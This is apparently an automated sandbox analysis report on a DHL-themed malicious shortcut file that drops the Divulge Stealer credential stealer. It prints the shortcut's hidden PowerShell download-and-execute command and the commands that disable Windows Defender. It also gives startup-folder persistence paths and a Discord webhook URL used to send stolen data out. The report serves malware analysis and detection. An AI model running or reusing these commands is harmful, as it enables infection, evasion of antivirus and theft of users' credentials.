Edit tour

Windows Analysis Report
DHL AWB-documents.lnk

Overview

General Information

Sample name:	DHL AWB-documents.lnk
Analysis ID:	1579624
MD5:	5e3249c32a70dc3b8d108c8bfe50c4d0
SHA1:	724787b337134448fd07cc626f9fa7edf978db3f
SHA256:	b3be3371628c3633b544d0e73a2b0dfe93faef9f49cea25b7b88d7a9d9a1bccf
Tags:	DHLlnkuser-abuse_ch
Infos:

Detection

Divulge Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Divulge Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Drops PE files to the startup folder

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies the hosts file

Powershell drops PE file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Windows shortcut file (LNK) contains suspicious command line arguments

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

setup_x86.exe (PID: 1220 cmdline: "C:\Users\user\Downloads\setup_x86.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)

powershell.exe (PID: 3224 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2848 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 4024 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3380 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3552 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4044 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2828 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1404 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2084 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: Divulge Stealer

{"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Downloads\setup_x86.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: setup_x86.exe PID: 1220	JoeSecurity_DivulgeStealer	Yara detected Divulge Stealer	Joe Security
Process Memory Space: setup_x86.exe PID: 1220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.setup_x86.exe.1f316940000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe" , ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', ProcessId: 3224, ProcessName: powershell.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe" , ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 4024, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\Downloads\setup_x86.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\Downloads\setup_x86.exe	Avira: detection malicious, Label: HEUR/AGEN.1307507

Found malware configuration

Source: 3.0.setup_x86.exe.1f316940000.0.unpack

Malware Configuration Extractor: Divulge Stealer {"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	ReversingLabs: Detection: 87%
Source: C:\Users\user\Downloads\setup_x86.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: DHL AWB-documents.lnk	Virustotal: Detection: 46%			Perma Link
Source: DHL AWB-documents.lnk	ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	Joe Sandbox ML: detected
Source: C:\Users\user\Downloads\setup_x86.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DHL AWB-documents.lnk

Joe Sandbox ML: detected

Source: C:\Users\user\Downloads\setup_x86.exe

Code function: 3_2_00007FFD34A82B43 CryptUnprotectData,

3_2_00007FFD34A82B43

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.6:49840 version: TLS 1.2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.138.232 162.159.138.232

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /l2rczc.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /l2rczc.pif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: files.catbox.moeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1Accept: application/jsonUser-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17Content-Type: application/json; charset=utf-8Host: discord.comContent-Length: 885Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 05:42:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734932529x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2MJt5yw33gp99HXq0sNJkjx6pt0POCB%2FV%2F0dSC%2BJu3F%2BWGIU%2Bhg6Np8BJXhpBOZWthRtdYk9lgQpffH1AVe81pZ6p67OGz5R7UsSj8%2BkHBJxFSNsq2NkpV5%2F4C22"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=8968e1cf982334ba284b7e504864cc8a1af43008-1734932528; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=wfgyQ2eOyERPUEGWvq7Yo8jHtzag6NH_ATxTUYFsPB8-1734932528107-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f6606caaab87cf0-EWR{"message": "Unknown Webhook", "code": 10015}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 23 Dec 2024 05:42:11 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734932532x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKa8aiqY%2F060xm6oE%2B4dhFEH0%2BRwmjhR0j0CjRnbRbz3a50DLwvnMIRMvsgkN3pgfLEzQEtWlb14D8WYinGyChDezfxv8oFwuX3R997qi0GargkJ9o1y46ruRZV8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Server: cloudflareCF-RAY: 8f6606d70dca18c4-EWR{"message": "Unknown Webhook", "code": 10015}

Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5D60C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://files.catbox.moe
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318807000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F31871C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318807000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318807000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545P
Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5DA02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C1D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2307911377.000002286BC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D46864E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D468784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D459F8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C184E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2251492345.000002285BDD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5C021000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2251492345.000002285BBB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A64618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D4585D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C08471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2251492345.000002285BDD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2195462631.0000017D5BEA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.2216170840.0000017D74070000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coY
Source: powershell.exe, 00000000.00000002.2196008997.0000017D5C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2251492345.000002285BBB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A64553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A6456E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D4585D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C08471000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
